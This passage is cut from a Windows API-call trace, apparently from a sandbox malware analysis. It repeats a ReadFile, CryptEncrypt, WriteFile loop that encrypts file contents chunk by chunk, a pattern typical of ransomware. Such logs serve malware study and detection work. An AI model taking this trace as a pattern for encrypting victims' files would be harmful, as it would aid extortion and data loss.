lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.519] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.519] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.520] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.520] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.520] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.520] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.520] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.521] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.521] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.521] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.521] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.521] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.522] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.522] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.522] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.522] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.522] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.522] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.522] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.523] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.523] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.523] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.523] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.523] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.523] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.524] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.524] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.524] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.524] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.524] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.525] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.525] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.525] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.525] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.525] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.526] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.526] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.526] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.526] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.526] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.527] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.527] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.527] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) 